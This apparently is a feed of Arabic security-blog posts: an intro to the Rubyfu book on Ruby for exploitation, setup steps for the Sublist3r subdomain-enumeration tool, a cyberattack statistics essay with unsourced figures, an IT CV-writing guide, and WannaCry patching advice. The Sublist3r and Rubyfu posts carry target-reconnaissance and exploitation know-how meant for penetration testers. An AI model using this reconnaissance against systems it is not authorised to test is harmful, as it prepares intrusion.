هذا القسم يحتوي العديد من الأفكار البرمجية اللتي تحتاجها في اكتشاب و/أو استغلال ثغرات الويب. جزء مرن وشيق ويحتوي على طرق لم يناقشها أحد من قبل.

  • Module 0x5 | Exploitation KungFu

إذا كنت من مكتشفي ثغرات الـ Buffer Overflow  أو كنت من محبي كتابة Modules للميتاسبويت, ستجد هذا القسم مفيد لك جدا.

  • Module 0x6 | Forensic KungFu

حتى وإن كنت مخترِق, تحتاج معرفة كيف يفكرة المحققين كمان أنك قد تحتاج المهارات مهارات برمجية لعمل بعض المهام بعد الاختراق و المشابهة لعمل المحققين الجنائيين ولكن لتصعيد صلاحياتك أو لجمع المعلومات. هنا ستجد بعض المهرات السهلة والتي ستحتاجها عاجلا أم لاحقا.

ماذا عن المبتدئين؟

إذا كنت بتدئ في لغة الروبي فأنصحك بالذهاب إلى جزء المراجع في أخر الكتاب والبدء من هناك لكي تتعلم اللغة كي تستفيد أعلى استفادة من الكتاب وتستطيع أن تتواصل معنا إن احتجت المساعدة. هناك عدد لا نهائي من المصادر للغة الروبي, فلا تتردد في البد ولا تهدر وقتك في المقارنة بين اللغات فهذا لن يجعلك مبرمجا أفضل.

تواصل معنا!

تواصلك معنا يثري المحتوى و يوصلنا إلى أفضل نتائج للكتاب, فالكتاب مصنوع من المجتمع وإلى المجتمع.

طرق التواصل

تستطيع أن تشارك معنا وطرح الأسئلة على المخزن الرسمي في موقع جيت هب Rubyfu issues وسنقوم بالتفاعل معك ويسعدنا مساهمتك معنا في المشروع

شكر وعرفان

كما تعلمنا من عالم المصادر المفتوحة, نحب دائما الإشادة بكل من ساهم ويساهم في تقدم مشروع كتاب Rubyfu . حاولنا بشتى الطرق إيجاد طرق للتعبير عن تقديرنا للمشاركين فاتقفنا على الطرق التالية

  1. وضع إسم المشاركين في قائمة الشرف للمشاركين في الكتاب. تسطيع أن تكون من مشارك إلي كاتب في الكتاب بناء على حجم مشاركاتك وإضافاتك للكتاب.
  2. إرسال قميص يحمل شعار الكتاب و المبدأ القائم عليه هدية إلي باب منزلك. مثال في الصور التالية.

rubyfushirt1 rubyfushirt2

ختاماً

في الختام نحب أن نشكر كل المساهمات المحورية في حياة هذا المشروع منذ بدايته والتي كانت أكثر بكثير من المتوقع والتي كانت بعد الله أحجار أساس النحجاح الذي وصل إليه هذا المشروع حتى اليوم. كمان أننا نشكر كل من سيساهم معنا مستقبلا بشتى الطرق.

 

 

أداة Sublist3r للبحث عن الدومينات الفرعية في محركات البحث

$
0
0

Sublist3r_Logoمن أهم مراحل عملية إختبار الاختراق هي عملية جمع المعلومات عن الهدف , فمختبر الاختراق المحترف هو من يقوم بإجادة هذة المرحلة و يقوم بجمع المعلومات عن الهدف بشكل دقيق حتى يستطيع ان يقوم بإختراقه بعد ذلك بنجاح . و من مراحل جمع المعلومات هي تحديد الدومنيات الفرعية الخاصة بالهدف , مثلا اذا كان الهدف هو إختراق google.com فلابد ان يقوم مختبر الاختراق بالبحث عن جميع ما يخص شركة جوجل و يبحث عن نقاط الضعف بها , فمثلا سوف يقوم بالبحث عن الثغرات في mail.google.com و plus.google.com و translate.google.com و غيرها من خدمات جوجل.

أداة Sublist3r هي أداة صنعت خصيصاً لكي تساعد مختبري الاختراق في البحث عن الدومينات الفرعية الخاصة بالهدف , فهي تساعد مختبري الإختراق و صائدين الثغرات في برامج المكافآت المالية ( BugBounty Programs )  في تحديد و جمع الدومينات الفرعية الخاصة بالهدف من خلال إستخدام محركات البحث مثل Ask, Baidu , Bing, Yahoo , Google و ايضا من خلال خدمة Netfcraft و خدمة DNSdumpster. الأداة تقوم ايضاً بجمع الدومينات الفرعية الخاصة بالهدف من خلال التخمين او الـ BruteForce باستخدام قاموس اوwordlist يحتوي على اغلب أسماء الدومينات الفرعية المشهورة .

الأداة تم برمجتها بلغة Python و هي مفتوحة المصدر تحت رخصة GNU GPL و يستطيع اي شخص ان يقوم بتعديلها و تطوير الكود الخاص بها .

هذة صورة للأداة عند تجربتها على موقع Yahoo.com

Sublist3r

ألإداة تحتاج لتنصيب بعض مكتبات Python  حتى تعمل بشكل سليم و إليكم طريقة تنصيبها على أنظمة لينوكس:

Requests library

  • لتنصيب المكتبة على Ubuntu او Debian:
sudo apt-get install python-requests
  • لتنصيب المكتبة على Centos او Redhat:
sudo yum install python-requests
  • لتنصيب المكتبة باستخدام مدير الحزم الخاص بـلغة Python:
sudo pip install requests

dnspython library

  • لتنصيب المكتبة على Ubuntu او Debian:
sudo apt-get install python-dnspython
  • لتنصيب المكتبة باستخدام مدير الحزم الخاص بـلغة Python:
sudo pip install dnspython

argparse library

  • لتنصيب المكتبة على Ubuntu او Debian:
sudo apt-get install python-argparse
  • لتنصيب المكتبة على Centos او Redhat:
sudo yum install python-argparse
  • لتنصيب المكتبة باستخدام مدير الحزم الخاص بـلغة Python:
sudo pip install argparse

لتحميل الأداة و مزيد من التفاصيل قم بزيارة الرابط التالي:

https://github.com/aboul3la/Sublist3r


عهد جديد من الهجمات الإلكترونية تدفعنا إلى الاهتمام بأمن المعلومات

$
0
0

cyberattacks

أصبحت قضايا أمن المعلومات من الخطورة بالمكان الذي يحتم علينا الاهتمام بكل ما هو جديد فيها،، فبعد توسع التقنيات الحديثة التوسع الذي جعلها تطال معظم مناحي الحياة الأصلية منها و الفرعية، الضرورية منها و الترفيهية، و دخول عالم الانترنت و الأجيال المتلاحقة من التكنولوجيا علي حياتنا اليومية تزداد الحاجة الماسة للاهتمام بجميع الموضوعات التى تخص أمن المعلومات.

لعلنا في السطور القادمة سنقوم بعرض بسيط لخطورة الوضع الحالي،،

في النصف الأخير من القرن العشرين، كان استخدام الكمبيوتر محدود للغاية حيث اقتصر الاستخدام فقط على المنظمات و الهيئات الكبرى كالجامعات و الوزارات و المصانع العملاقة،، و كانت البيانات موجوده بالصورة الورقية بجانب النسخ الإلكترونية ،، وكان تداول الوثائق الورقية هو الأصل فى التعاملات اليومية بينما يقتصر تدخل الكمبيوتر على مجرد توثيق أو حفظ إلكتروني لتلك الوثائق أو البيانات.

في نهايات القرن العشرين بدأت الكمبيوتر يزحف بشكل ملحوظ إلى المدارس و الجامعات، فرأينا معملا للحاسب الألي في كل مدرسة و جامعة مثلا بل و انتشرت الى الجمعيات الأهلية و المصالح الحكومية.

مع نهاية القرن العشرين و بداية القرن الحادي والعشرين ظهر بقوة مفهوم الكمبيوتر الشخصي و كمبيوتر لكل منزل و انتشر المفهوم بصورة سريعة بعد التوسع في توصيل الانترنت و ظهرت مقاهي الانترنت و بدأ تداول مفاهيم جديدة كالمواقع الالكترونية و البريد الالكتروني و هكذا.

على مر السنوات العشرة الأخيرة، اتسعت بشكل صاروخي الدائرة الإلكترونية و الحواسيبية حولنا، فأصبح وجود الانترنت ضروريا و أصبح كل منا يحمل هاتف ذكي و كمبيوتر محمول، بجانب الحاسب الشخصي في المنزل أو العمل هذا إلى جانب الساعة الذكية و التلفزيون الذكي و أنظمة التتبع فى السيارات و الأنظمة الذكية للتحكم في المنزل و جميعها متصلة بالانترنت، و ظهرت و بقوة وسائل التواصل الاجتماعي و التوظيف الإلكتروني و ما إلى أخر ذلك من تطبيقات و استخدامات الانترنت التي يصعب حصرها و نستخدمها بصورة لحظية تقريبا و جميعها متصل بالانترنت.

ليس هذا وحسب، فالمؤسسات و المصانع و المصالح الحكومية و البنوك و المراكز التجارية إلخ، أصبحت تستخدم الكمبيوتر لكل من موظفيها و بشكل رسمي و ضروري و أصبح لكل مؤسسه أو مصلحة موقع و نطاق إلكتروني ،، و أصبحت الأجهزة المعاونة مثل الطابعات و الفاكسات و الهواتف و ماكينات النسخ الورقي كلها متصلة بالانترنت و يمكن التحكم بها أليا وعن بعد.

انتشرت و بشدة أنظمة الأمن الإلكتروني في المصالح الحكومية و المصانع و المراكز التجارية و حتى فى المنازل مثل أنظمة التحكم عن بعد و الأبواب الإلكترونية و التسجيل الفوتوغرافي بالكاميرات و كلها متصلة بالانترنت و يمكن التحكم بها أليا وعن بعد.

تحولت الماكينات في المصانع من مجرد ماكينه مصمته تقوم بمهمه محدده إلى جهاز كمبيوتر متصل بالانترنت و يعمل بنظام تشغيل معين و يقوم بعمل تحديثات دورية للتحكم فى تشغيل ماكينه أو عدة ماكينات.

ومع تزايد هذا العالم الإلكتروني هذه الزيادة شديدة التسارع بموازاة تقدم تقنيات التصنيع الالكتروني،، تتسارع معها و بقوة نوعية و طرق و أساليب الهجمات السيبرالية، بل أن هذا التسارع يسهل و يتيح أساليب جديده و طرق أعنف فى شكلية الهجمات السيبرالية.

فبعد أن كان هناك كمبيوتر واحد فى مكتبة جامعة مثلا يستعمله ما يقرب من 100 طالب يوميا (و نفس المثال بالنسبه لمصلحة حكومية أو شركة أو مصنع) مما يجعل احتمالية الهجوم على شخص بعينه لا تزيد عن 5 % ، ازدادت هذه الاحتمالية الى ما يقرب الــ 99% في وجود الشخص محاطا بدائرة من الأجهزة و التقنيات و التطبيقات الإلكترونية المتصلة بالانترنت.

و بعد أن كان الهاكر او المهاجم يعمل بصورة عامه و طفولية و يرمي إلى زيادة شهرتة في عالم الإختراق أو إظهر قدرتة على تخريب نظام معين، أصبح يعمل بصورة دقيقة و يرمي الى الكسب المادي و ينتقي هدفة بكل عناية و يستمر فى استهدافه و يقوم بجمع أكبر كمية من المعلومات عنه و يحافظ على وجوده داخل أنظمة الهدف و تسريب أكبر كمية من المعلومات الهامة حتى لو تطلب هذا الحفاظ على أنظمة الهدف نفسه وإصلاحها فى بعض الأحيان.

و بعد أن كانت أساليب الهجوم محدوده فى مجموعة من الفيروسات او الملفات الضارة .. إلخ، تعددت أساليب الهجوم و تنوعت و أصبحت كترسانة الأسلحة الفتاكه تحت يد الهاكر او الماجم يقوم باستخدامها أو التهجين بينها.

مع تعدد التقنيات الإلكترونية و شدة الإقبال على استخدامها ظهر مفهوم التحكم المركزي ) ( Centralized Control Systems الذي يجمع بين أكثر من تقنية بداخله،، فمثلا أنظمة الدخول و الخروج في مؤسسة ما تتكامل مع أنظمة المراقبة و التسجيل بالكاميرات ومع الأبواب الإلكترونية ومع أنظمة حساب الرواتب الشهرية و جميعها تخضع لنظام تحكم واحد مركزي ) ( Centralized بحيث يكون أكثر شمولية و سرعة فى التحكم وإعطاء نتائج أفضل،، و لكن اذا تم اختراق نظام التحكم المركزي يتم التحكم بكل هذه التقنيات المربوطه به و يصبح من الصعب جدا منع الهجوم من التسبب فى خسائر وأضرار أكبر!!

مثال أخر،، أصبحت أجهزة التلفزيون تضمن بداخلها دائرة التحكم عن بعد Remote Control ) ( و جهاز التقاط البث من الاقمار الصناعية (Receiver) و دوائر التوصيل اللاسلكي بالانترنت (Wi-Fi) و كمبيوتر مصغر(Embedded Computer) للتحكم بكل هذا بجانب تقنيات أخرى،، فلو فرضنا بحدوث اختراق للاتصال اللاسلكي و يقوم المخترق الأن بتغيير التقاط البث من أقمار صناعة (Satellites Sync) معينة أو يقوم ببث مواد غير مرغوب فيها لن تستطيع حينها فصل الريسيفر أو فصل دائرة الاتصال اللاسلكي لانها اصبحت مدمجة داخل التلفزيون،، نعم أصبح التحكم بالتقنية أسهل و لكن أيضا أصبح اختراق التقنية أكبر خطورة،، و بالفعل هذا قد حدث مع نوعية معينة من أجهزة التلفزيون التي تقدم تقنية الاتصال اللاسلكي و التحكم المركزي.

و كأمثلة على ما سبق سنقوم بعرض بعض الأضرار الواقعية في عشر نقاط ،، تدفعنا و بقوة إلى الإهتمام الشديد بقضايا أمن المعلومات

  1. الخسائر المقدرة جراء الجرائم السيبرالية على مستوى العالم تقدر 100 مليار دولار سنويا و الرقم في تزايد من سنة لأخرى.

  2. هناك أكثر من 1.6 مليار مستخدم لوسائل التواصل الإجتماعي حول العالم، و 64 % من مستخدمي الإنترنت يستخدمونها بصفة لحظية، و تعد وسائل التواصل الإجتماعي من التقنيات المحببة جدا للهاكرز حيث يتم اختراق ما لا يقل عن 600 الف حساب Facebook فقط يوميا .و يعد واحد من كل عشرة مستخدمين لوسائل التواصل الإجتماعي مخترق بالفعل و يتم التلاعب به من قبل المخترقين.

  3. أكثر من 95% من أجهزة الكمبيوتر معرضة لثغرات التطبيقات اللكترونية (Exploit Kits) حيث أنه يكاد لا يخلو جهاز كمبيوتر من تطبيقات مثل Oracle Java, Adobe Reader or Adobe Flash و اكتشاف ثغرات في مثل هذه التطبيقات ينجم عنه أخطار جثيمة.

  4. ما يقرب 59% من الموظفين في المؤسسات يكونون السبب في جرائم سيبرالية على مؤسساتهم سواء عن قصد بتسريب بيانات سرية أو ملكيات حساسة للمؤسسة أو دون قصد مثل أن يقوم المخترق بخداعهم بطريقة ما ليستخدم صلاحياتهم أو بعدم اكتراثهم لموضوعات أمن المعلومات و عدم حفاظهم على تعليمات الأمن المعلوماتي المتبعة في المؤسسة.

  5. من الطرق المحببة أيضا للهاكرز للتلاعب بضحاياهم هي الهندسة الاجتماعة (Social Engineering) و نتيجة لهذا أثبتت الإحصائيات أن أكثر من 1 مليار دولار تم سرقتهم من بنوك فى 30 دولة على مستوى العالم خلال عامين.

  6. الالتزام السيبرالي – Cyber security Compliances – قد يتفاجئ البعض عندما يعلم أن اللتزام بمعايير الأمن المعلوماتي و السيبرالي قد يكون أحد اسباب الهجمات .. فمجرد الالتزام بوجود تقنيات حماية معينة في المؤسسات أو البنوك مثلا ليس كاف بالمرة لتحقيق الحماية – و لكن الواجب ان تكون تلك التقنيات معدة الإعداد الصحيح و يعمل عليها مسؤولين مدربين بعنياة و يتم تحديثها فى الاوقات المحددة ،، و كذلك متابعة تقنيات الهجمات الجديدة للتحقق من كفاية تقنيات الحماية لمواجهتها او الاحتياج لتقنيات جديدة،، و في بعض الأحيان قد تظهر ثغرات خطرة فى أنظمة الحماية نفسها كمثل التى نراها فى الجدران النارية مثل FortiGate مثلا أو برامج الحماية ضد الفيروسات و خلافه.

  7. 68% من من الموارد المالية تذهب للحماية ضد الهجمات السيبرالية و معالجة ما ينجم عنها،، حيث يقدر الوقت المستهلك لتحليل هجوم معين و حصر أخطاره و معالجة أضراره بــ 170 يوما طبقا لبحث أجراه Ponemon Institute .

  8. 178% زيادة فى عدد الهجمات منذ عام 2010 حيث تقدر عدد الهجمات السيبرالية الناجحة اسبوعيا بمتوسط 138 هجمة .

  9. يقدر نسبة 15% تقريبا من مستخدمي الهواتف الذكية قد تعرضوا فعليا لهجمات سيبرالية، و تزيد الاحتمالية بتعرض ما يقرب من 60 % من مستخدمي الهواتف الذكية و اللوحية لهجمات سيبرالية اذا ما لم يقوموا بتزويد أجهزتهم بوسائل حماية مناسبة.

  10. قامت شركة Fiat Chrysler Automobiles بسحب ما يقرب من 1.4 مليون مركبة لتعديل و تغطية ثغرات في نظامها تسمح للمخترقين بالتحكم في بعض خصائصها و ذلك بعد الحادثة الشهيرة باختراق المركبات الالكترونية لشركة JEEP.

المصادر:

 

 

كيف تكتب الـ CV الخاص بك في مجال تكنولوجيا المعلومات

$
0
0

banner_formazione

السلام عليكم ورحمة الله وبركاته,

واجهتني مشاكل كثيرة في بداية حياتي العملية بسبب كتابة ال CV ولم أملك الخبرة الكافية وقتها لكتابته بشكل احترافي, أما وبعد سنوات من الأسئلة والتجربة والتعديلات, أحببت أن اشارك معكم الطريقه الأفضل لكتابة ال CV الخاص بك في مجال تكنولوجيا المعلومات بشكل عام سواء كنت مبرمج او مختبر اختراق او مكتشف ثغرات او مهندس شبكات إلي آخره.

سأقوم إن شاء الله في نهاية المقال بإرفاق نسخة معدة مسبقا ويمكنكم التعديل عليها وإستخدامها لكتابة سيرتكم الذاتية.

مقدمة سريعة:

كما نعلم جميعا أن الـ CV الخاص بك هو عباره عن انعكاس لك, بمعني انه هو الذي يتحدث نيابة عنك ويوضح ما اللذي تعرفة وماذا عملت مسبقا لذا ما يحتويه الـ CV الخاص بك لابد ان يظهر مهاراتك ونجاحاتك بشكل إحترافي.

الـ CV يجب أن ينقسم لعدة أجزاء كل جزأ يوضح نقطه معينة, لذا سأبدا بتحديد النقاط فيما يلي مع مراعاة ان هذا هو الترتيب المناسب والذي أستخدمه شخصيا في كتابة سيرتي الذاتية.

 

١- معلومات عنك

بداية الـ CV الخاص بك يجب ان يحتوي علي معلومات لتعريف الشركة بك, مثل اسمك, بريدك الإلكتروني الذي سيتم مراسلتك من خلاله, رابط لموقعك اذا كان لديك موقع خاص بك حتي يمكنهم الإطلاع علي المقالات التي تقوم بكتابتها او عن اخر اكتشافاتك وبالطبع رابط لحسابك علي موقع LinkedIn الشهير فهو بمثابة سيرتك الذاتية, مثال:

Name: Ebrahim Hegazy
Email: myemail@gmail.com
Website: http://www.security4arabs.com
LinkedIn: https://www.linkedin.com/hegazy

لا تكتب: 

لا تقم أبدا بكتابة تفاصيل خاصة عن حياتك داخل الـ CV فقد رأيت الكثير من الناس يقوم بكتابة اسمه بالكامل وعنوان بيته وحالته الإجتماعية وموقفه التجنيدي والمزيد المزيد!! لا داعي مطلقا لكتابة مثل هذه البيانات فهي لن تفيد في أي شئ للوظيفة ولو احتاج صاحب العمل ان يعرف عنوانك او حالتك الاجتماعية فإنه سيقوم بمراسلتك علي البريد الذي قمت بكتابته.

ملحوظة: هناك بعض الوظائف تتطلب ان يكون رقم هاتفك مكتوب في السيرة الذاتية لذا القرار لك أن تكتبه او لا فليست كل الوظائف تتطلب ذلك.

٢- من أنت (Profile)

هذا القسم يشرح طبيعة عملك لمن يقرأ الـ CV, ليس هناك مسؤل توظيف يفهم كل الوظائف, فأنت مثلا لو قرأت سي في خاص بأحد العاملين في مجال الكيماويات هل ستفهم منه شئ؟ بالطبع لا, لذا لابد أن تكتب في بداية الـ CV الخاص بك ما يوضح طبيعة عملك حتي يستطيع مسؤل التوظيف فهم ما تفعله تحديدا بدون استخدام مصطلحات معقدة خاصه بمجالك, مثال:

Profile

Ebrahim is a security researcher specialized in finding web applications vulnerabilities, He has over 3 years of experience in information security field that varies from Web Application Security, Incident handling and Network Security with a good knowledge of Web Applications Development

ما كتبته هو مثال بسيط (لا يعبر عني) يوضح طبيعة عملك إذا كنت مكتشف ثغرات مثلا او تعمل بمجال أمن المعلومات بشكل عام.

٣- نجاحاتك (Achievements)

هذا القسم هام جدا جدا وهو عامل الإنبهار الذي سيميز سيرتك الذاتية عن باقي المئات من السير الذاتية المقدمة للشركة, فهو يحتوي علي أهم النجاحات التي قمت بها خلال فترة عملك او حتي خلال فترة دراستك بالجامعة, فمثلا لو كنت تعمل مبرمجا فسيكون هذا القسم مثلا بالشكل التالي:

Achievements
Won the second place with my team in ACM competition X
Ranked as 45 in CodeForces website after solving complex programing problems
Achieved a certificate of appreciation from my University for building their internal Application/database system
etc etc etc

ولو كنت تعمل بمجال إكتشاف ثغرات المواقع فسيكون هذا القسم بالشكل التالي مثلا:

Achievements
Rewarded and acknowledged by Facebook, Yahoo, Google for finding critical vulnerabilities in their systems
Ranked as number 4 in X Bug bounty program for finding critical RCE vulnerability in their website
Won the 3rd place with my team in X CTF (Capture the Flag) competition
etc etc etc

وعلي هذا المنوال يمكنك كتابة نجاحاتك الشخصية بإختلاف مجال عملك فبالتأكيد كل منا له نجاحاته الشخصية 🙂

00000000316.0

٤- مستواك التعليمي (Education)

هذا الجزأ خاص بمستواك التعليمي كمثال أنك تخرجت من جامعة كذا بقسم كذا ويمكنك كتابة سنة التخرج إذا أردت, وحتي إذا لازلت طالب بالجامعة فيمكنك أن توضح ذلك, نفس القسم أيضا يشمل الشهادات التي حصلت عليها من خلال الكورسات التي درستها, واذا لم تحصل علي شهادات فيمكنك كتابة المستوي التعليمي فقط كما يلي:

Education
Bachelor of Computer Science from Cairo University (Egypt)

مثال آخر علي كتابة المستوي التعليمي والشهادات

Education & Certification
Bachelor of Computer Science from Cairo University (Egypt)
Cisco Certified Network Associate (CCNA)
Certified Ethical Hacker (CEH)
Red Hat Certified Engineer (RHCE)

٥- عملك وخبراتك السابقة (Work Experience)

في هذا القسم تقوم بكتابة أسماء الشركات التي عملت بها مسبقا وطبيعة عملك او المسمي الوظيفي الخاص بك في كل شركة ووقت العمل بها, حتي لو كان ذلك العمل عمل حر FreeLance Job او من خلال الإنترنت إلخ فيجب أن تقوم بكتابته أيضا, ويكون ترتيب كتابة الشركات بناء علي الأحدث ثم الأقدم بحسب ترتيب السنوات, وكما يلي عدة أمثلة لتساعدك علي كتابة هذا القسم بإختلاف مجال عملك:

Work Experience

Vodafone, from December 2012 to October 2013 – Network Engineer
My job at Vodafone as a network engineer included managing the company network infrastructure
Administering & designing LANs, WANs internet/intranet, and voice networks
Working with multiple technical platforms i.e. mainframe, two tiered client servers and three tiered client servers
Co-operating with the systems team during the installation/implementation of new appliances inside our data-center etc etc

Security4Arabs, from September 2015 to Present – Security Engineer
My job in Security4Arabs company includes incident handling, network security reviews, Penetration testing and managing security devices such as the Firewall, IDS & IPS, my job role also includes etc etc

Freelance Security Researcher, from May 2014 to June 2015 – Red Team
I’ve been working as a security researcher with different platforms such as Hackerone and BugCrowd, the projects i joined included public and private bug bounty programs and it was mainly focused on Web Applications Vulnerabilities hunting, during that time i was ranked as number 5 in X bug bounty program for finding critical vulnerabilities in their website

SecDown, from October 2013 to March 2014 – System Administrator
I joined SecDown company as a systems engineer managing their linux servers and handling the full servers installation including the physical and virtual servers running Vmware technology, my job role also included Windows servers installation and configuration of active directory

Freelance Developer, from June 2011 to October 2013 – PHP Developer
I’ve been working as a freelance developer in different online platforms such as StackOverFlow, etc, etc, building applications with different technologies such as bootstrap, NodeJS, etc etc and using different frameworks such as CakePHP & Symfony, my job role also included etc etc

٦- مقالاتك وشروحاتك (Publications)

هذا القسم يتضمن بعض المقالات الهامة التي قمت بكتابتها في مواقع معينه او حتي في مدونتك الخاصة او خبر تم كتابته عنك في صحيفة معينه او بحث قمت بعمله او كتاب قمت بتأليفه او محاضرة قمت بإلقائها في مؤتمر في جامعتك او مؤتمر عالمي أو ورقة بحثية قمت بكتابتها إلخ إلخ مع كتابة رابط او صفحه تحتوي علي ما قمت بذكره حتي يمكن الإطلاع عليه, مثال علي ذلك :

Publications
Write-up, How to develop web application in NodeJS from Zero to Hero – reference
Speaker at Cairo Security Camp conference about xyz – reference
Write-up, How to build a threat intelligence system in your corporate – reference
Contributed to TechnlologyGuru Magazine with 2 articles – reference

الرابط المدرج في كلمة Reference عليك إستبدالة برابط يحتوي علي ما قمت بذكرة حتي يتثني للشركة الرجوع إليها للإطلاع علي محتوي المقالات.

7- المشاريع التي أنجزتها (Projects)

في هذا القسم ستقوم بكتابة المشاريع التي أنجزتها خلال فترة عملك او حتي مشروع التخرج الخاص بك في الجامعة وكذلك المشاريع التي قمت بعملها أثناء فترة عملك الحر إلي آخره, مثال إذا كنت مهندس شبكات:

Projects
Vodafone: I was one of the team who designed the corporate network inside vodafone which included the installation and configration of routers and switches
Saudi Telecom Company (STC): Installed and configured WAN Optimizer across their branches, also worked on the implementation of their new VPN solution

مثال إذا كنت مختبر إختراق

Projects
Isecur1ty: I’ve been a consultant in Isecurity team conducting consultation and penetration testing services for various customers in the middle east
HSBC: Worked on a penetration testing project of HSBC bank internal network and internal web-applications
Zain: Worked on a Security Assessment for Zain newly launched mobile application along with its back-end system

مثال إذا كنت مبرمج

Projects
By2olak: I’ve been part of the team who developed by2olak application, responsible for the development of the backend application to manage users comments & adding more features to the API
Shopping Application: During my graduation project i worked with 4 other colleagues to develop a shopping application in PHP and a Mysql Database as a backend.
Masrawy.com: Developed the search engine of Masrawy.com using ASP.NET and MVC Framework with MSSQL Server database

7- الكورسات (Courses)

كثيرا ما قمت بحضور كورسات بدون إمتحان هذا الكورس للحصول علي شهادته, لذا في هذا القسم تقوم بكتابة أسماء الكورسات التي حضرتها, مثال علي ذلك:

Courses
Ebrahim also attended below courses
Cybrary.it (CYB-3008) – POST Exploitation Technique
Red Hat Certified Technical (RHCT)
SANS (Sec504 – GCIH) – Hackers Techniques, Exploits & Incident Handling

نصائح هامة:

١- لابد أن تكتب السيرة الذاتية الخاصة بك باللغة الإنجليزية

٢- لا يمكن بأي شكل من الأشكال ان تزيد سيرتك الذاتية عن ثلاث صفحات, قم بتصغير الخطوط وحذف المسافات وكتابة العناصر المهمه فقط المهم أن لا يتعدي الـ CV الخاص بك الثلاث صفحات ويفضل أن يكون صفحتين إن أمكن.

٣- جهز لديك بعض جهات التواصل كمرجع للشركة التي تقوم بالتقديم فيها إذا أرادات السؤال عنك فمثلا إذا قمت بعمل مشروع لشركة X فبالتأكيد لديك البريد الإلكتروني لأكثر من شخص داخل الشركة يمكنك إستخدامهم كمرجع Reference لتقييمك وإعطاء رأيهم عنك Feedback حينما تريد ذلك.

٤- السيرة الذاتية قد تسمي CV وقد تسمي Resume والفرق ان ال Resume هو نسخة مختصرة لتعبر عن مهاراتك وأعمالك فقط بينما ال CV يحمل تفاصيل أكثر, لكن لا مشكلة في ذلك يمكنك إعتبارهم نفس الشئ 😀

وإليكم رابط الـ CV التالي في نسخة Word يمكنكم التعديل عليها بحسب وظيفتكم وطبيعة عملكم حتي يكون الموضوع أسهل عليكم إن شاء الله.

https://docs.google.com/document/d/1fvZ5BMVoy3IXue_qulOdJNwdmRibtRmaVdsZRNDuQfY/edit?usp=sharing

وفي نهاية الموضوع أود توجيه الشكر للمهندس حاتم الصفطي والمهندس محمد طاهر علي مساعدتهم أثناء فترة الإعداد لهذا المقال.

إذا كانت هناك نقطه غير واضحه او أردتم المساعدة فقط قم بكتابة تعليق علي هذه التدوينة وسيتم الرد عليكم بالتفصيل ان شاء الله 🙂

فيروس الفدية WannaCry وكيف تنقذ مؤسستك منه قبل فوات الأوان.

$
0
0

 

السلام عليكم إخواني الكرام,

انتشر وبشدة فيروس WannaCry منذ البارحه كالنار في الهشيم وأصاب اكثر من 40000 الف جهاز كمبيوتر في حوالي 74 دولة حول العالم ما بين مؤسسات حكومية و ما يقرب من 16 مستشفي في إنجلترا ومن المؤسف تعليق أحد الدكاترة بأحد المستشفيات التي اصيبت انظمتها بهذا الفيروس علي موقع الجارديان قائلا بأن جميع العمليات توقفت في المستشفي منذ الواحده مساء وتم حذف جميع سجلات المرضي ونتائج الفحص وأن حياة أشخاص كثيرون علي المحك بسب هذه الكارثه وبالتأكيد سيكون هناك موتي جراء إنتشار هذا الفيروس!!!

مرورا بأكبر شركة اتصالات في إسبانيا وغيرها من الأهداف التي اصيبت بهذا الفيروس حتي ان وزارة الداخلية الروسية لم تسلم. لذا قررنا علي وجه السرعة كتابة مقال يتلخص في جزأين. ما اللذي نعرفه عن الفيروس وماذا يتوجب عليك فعله لتحمي مؤسستك او شركتك التي تعمل بها قبل فوات الأوان.

ما اللذي نعرفه عن الفيروس حتي الآن:

1- الفيروس مثله كمثل اي فيروس فديه أخر يقوم بتشفير ملفات جهازك ويطلب منك مبلغ 300 دولار حتي يمكنك استرجاع ملفاتك مره اخري

2- هذا الفيروس يقوم بالإنتشار من خلال رسائل تصيد Phishing EMails يتم ارسالها لملايين الإميلات بشكل عشوائي ويحتوي الإميل المرسل علي ملف مرفق عندما يتم فتحه يقوم بتنزل فيروس الفديةWannaCry

3- من الطرق التي يستخدمها الفيروس أيضا هي عملية الفحص العشوائي للعناوين IP Addresses فيقوم بانشاء ايبي عشوائي ومن ثم فحص اذا ما كان port 445 مفتوح علي هذا الايبي ام لا وهو البورت المستخدم بواسطة خدمة مشاركة الملفات SMB فاذا وجد ايبي مفتوح فيه هذا البورت يقوم بفحص جميع الايبيهات التي علي نفس الشبكه ويحاول استغلال ثغرة MS17-010 عليهم جميعا.

4- بعد ان يقوم الفيروس بالنزول علي جهاز الضحيه واصابته يقوم مباشرة بفحص كل الايبيهات الموجوده علي الشبكه باحثا عن اي جهاز يستخدم port 445 الخاص بخدمة مشاركة الملفات SMB Service

5- اذا وجد اي جهاز علي الشبكه يستخدم خدمة مشاركة الملفات فانه يقوم بإستغلال الثغرة الخطيرة التي تم الاعلان عنها عقب تسريبها من فريق الأمن القومي الأمريكي NSA بواسطة فريق ShadowBrokers والثغره معروفه باسم MS17-010 وهي ثغره تصيب كل أنظمة الوندوز وتمكن المخترق من إختراق اي جهاز تعمل عليه خدمة مشاركة الملفات SMB

6- ولان خدمة مشاركة الملفات منتشره في كل الشركات وحتي اغلب الشبكات الخاصه فبهذه الطريقه انتشر الفيروس كالنار في الهشيم في اكثر من اربعه وسبعين دوله حول العالم في وقت قياسي

7- من بين الدول المصابه بالفيروس هي ألمانيا, روسيا, إنجلترا, أسبانيا, أمريكا, الأرجنتين وغيرها من الدول العربية أيضا التي لم تسلم من ذلك الفيروس

8- وللاسف تم الإبلاغ عن انتشار موسع للفيروس داخل 16 مستشفي في إنجلترا وتعطل انظمة تلك المستشفيات بسبب أن الفيروس قام بتشفير سجلات المرضي ولا يمكنهم استقبال اي حالات جديدة 🙁

ما اللذي يتوجب عليك فعله:

١- قم فوراا بعمل تحديث لجميع أنظمة الوندوز داخل شركتك لتتأكد من ترقيع ثغرة MS17-010 والتي هي السبب الرئيسي في عملية الإختراق وانتشار الفيروس

اذا كان لاي سبب لديك مشكله في تحديث الوندوز فيمكنك استخدام تلك الأداه التي نشرتها شركة Symantec وتشغيلها بصلاحية administrator علي جهازك وسيقوم بعدها جهازك بإعادة التشغيل وتكون الثغره قد تم ترقيعها في جهازك

اما للشركات والبنوك وغيرها من المؤسسات فننصح بشده بعمل تحديث لجميع اجهزة وسرفرات الشركة مباشرة.

٢- تأكد من أن جميع أجهزة شركتك منصب عليها برنامج مضاد فيروسات وعليه جميع التحديثات لتضمن بأن بيانات هذا الفيروس file signatures موجوده في مضاد الفيروسات الخاص بك ليقوم بايقاف اي محاوله من الفيروس الدخول الي اجهزة الشركه

